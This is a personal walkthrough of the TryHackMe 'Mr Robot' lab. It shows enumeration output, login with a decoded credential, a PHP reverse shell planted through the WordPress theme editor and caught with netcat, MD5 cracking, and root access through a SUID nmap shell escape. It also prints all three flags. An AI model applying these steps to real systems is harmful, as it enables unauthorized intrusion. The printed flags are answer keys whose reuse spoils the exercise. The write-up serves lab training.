---------------------------------MR ROBOT ROOM TryHackMe-------------
Date : 24-03-2025
Link : https://tryhackme.com/room/mrrobot
Difficulty : Medium

-------Box enumeration---------------------------------
nmap -sC -sV -T4 -Pn 10.10.42.56
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-24 11:33 GMT
Nmap scan report for 10.10.42.56
Host is up (0.20s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open   ssl/http Apache httpd
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.90 seconds



In this case we know we can not enumerate the port 22 so we will focus on Two web ports 80 and 443
When i go on nboth sites i think it is the same thing, but i will wait the gobuster scan to see if it isreally the same sites


with the gobuster i found that

gobuster dir -u http://10.10.17.121 -w=/usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -x .txt -t 100
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.17.121
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 218]
/.htaccess.txt        (Status: 403) [Size: 222]
/.htpasswd.txt        (Status: 403) [Size: 222]
/.htpasswd            (Status: 403) [Size: 218]
/0                    (Status: 301) [Size: 0] [--> http://10.10.17.121/0/]
/0000                 (Status: 301) [Size: 0] [--> http://10.10.17.121/0000/]
/Image                (Status: 301) [Size: 0] [--> http://10.10.17.121/Image/]
/admin                (Status: 301) [Size: 234] [--> http://10.10.17.121/admin/]
/audio                (Status: 301) [Size: 234] [--> http://10.10.17.121/audio/]
/atom                 (Status: 301) [Size: 0] [--> http://10.10.17.121/feed/atom/]
/blog                 (Status: 301) [Size: 233] [--> http://10.10.17.121/blog/]
/css                  (Status: 301) [Size: 232] [--> http://10.10.17.121/css/]
/dashboard            (Status: 302) [Size: 0] [--> http://10.10.17.121/wp-admin/]
/favicon.ico          (Status: 200) [Size: 0]
/feed                 (Status: 301) [Size: 0] [--> http://10.10.17.121/feed/]
/images               (Status: 301) [Size: 235] [--> http://10.10.17.121/images/]
/image                (Status: 301) [Size: 0] [--> http://10.10.17.121/image/]
/intro                (Status: 200) [Size: 516314]
/js                   (Status: 301) [Size: 231] [--> http://10.10.17.121/js/]
/license              (Status: 200) [Size: 309]
/license.txt          (Status: 200) [Size: 309]
/login                (Status: 302) [Size: 0] [--> http://10.10.17.121/wp-login.php]
/page1                (Status: 301) [Size: 0] [--> http://10.10.17.121/]
/phpmyadmin           (Status: 403) [Size: 94]
/readme               (Status: 200) [Size: 64]
/rdf                  (Status: 301) [Size: 0] [--> http://10.10.17.121/feed/rdf/]
/robots               (Status: 200) [Size: 41]
/robots.txt           (Status: 200) [Size: 41]
/robots.txt           (Status: 200) [Size: 41]
/rss                  (Status: 301) [Size: 0] [--> http://10.10.17.121/feed/]
/rss2                 (Status: 301) [Size: 0] [--> http://10.10.17.121/feed/]
/sitemap              (Status: 200) [Size: 0]
/sitemap.xml          (Status: 200) [Size: 0]

When i recieve it the first thing i noticed is that the site is wordpress so i go te see the robots.txt

the content was that :
User-agent: *
fsocity.dic
key-1-of-3.txt

i firstly read the first location 
	http://10.10.17.121/fsocity.dic ---> i found a long list of woords
	http://10.10.17.121/key-1-of-3.txt ---> i found the first flag
	
FLAG1: 073403c8a58a1f80d943455fb30724b9
	
i was proud it was so easy to found the first flag 



---------------------------Now go to found the second flag---
i firstly download list of word that we found recently

 wget http://10.10.17.121/fsocity.dic 
 

As i know it is a wordpress site i will launch wpscan which is wordpress enumeration tool

wpscan --url http://10.10.17.121/ -e u

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.17.121/ [10.10.17.121]
[+] Started: Mon Mar 24 21:03:24 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache
 |  - X-Mod-Pagespeed: 1.9.32.3-4523
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://10.10.17.121/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.17.121/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] The external WP-Cron seems to be enabled: http://10.10.17.121/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.10.17.121/e67cd64.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.10.17.121/e67cd64.html, Match: 'WordPress 4.3.1'

[+] WordPress theme in use: twentyfifteen
 | Location: http://10.10.17.121/wp-content/themes/twentyfifteen/
 | Last Updated: 2024-11-12T00:00:00.000Z
 | Readme: http://10.10.17.121/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 3.9
 | Style URL: http://10.10.17.121/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.17.121/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] No Users Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Mar 24 21:03:36 2025
[+] Requests Done: 42
[+] Cached Requests: 26
[+] Data Sent: 10.815 KB
[+] Data Received: 224.04 KB
[+] Memory used: 187.93 MB
[+] Elapsed time: 00:00:12

At this level we only know the theme and some little informations.
No users
No password

so we will go to check on pages found in gobuster to see if we found something

At the poage : http://10.10.204.117/license

i found : ZWxsaW90OkVSMjgtMDY1Mgo=
decode: elliot:ER28-0652


so i think it is the username and password of the admin panel. let try connecting.
Bingo we have acces to the dashboard as we know the theme of wordpress we will go to put a reverse shell php 

location: http://10.10.204.117/wp-admin/theme-editor.php?file=404.php&theme=twentyfifteen

we put our php reverse shell from the site: https://www.revshells.com
reverse shell: php petromonkey

After that i update the page and launch my reverse shell 

We will just launch a page which don't existe to have our 404 page and launch our reverse shell

result:

rlwrap nc -lvnp 1234                  
listening on [any] 1234 ...
connect to [10.11.127.125] from (UNKNOWN) [10.10.204.117] 34979
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 09:18:51 up 51 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
sh: 0: can't access tty; job control turned off
$  whoami
daemon


i found something on robot directory

daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
daemon@linux:/home/robot$ 


let us crack this md5 with crackstation.net

encoded:c3fcd3d76192e4007dfb496cca67e13b
decoded:abcdefghijklmnopqrstuvwxyz

Now we have robot password xwe will logged in as robot and cat the fllag

daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$ 

Flag2: 822c73956184f694993bede3eb39f959
-----------------------------------Third flag-------------------------------------------------------------

After getting it we will try privilege escalation o gt the third flag 

we try sudo -l but nothing 
sudo -l
[sudo] password for robot: abcdefghijklmnopqrstuvwxyz

Sorry, user robot may not run sudo on linux.
robot@linux:~$ 

let try with find

robot@linux:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
robot@linux:~$ 


We find nmap and in the hint they tell us nmap so i will go to see if i have one thing on gtfobin
link:https://gtfobins.github.io/gtfobins/nmap/#sudo

robot@linux:/tmp$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
firstboot_done	key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
# 

Flag3: 04787ddef27c3dee1ee161b21670b4e4



Thank you for reading
@petstqar from TOGO
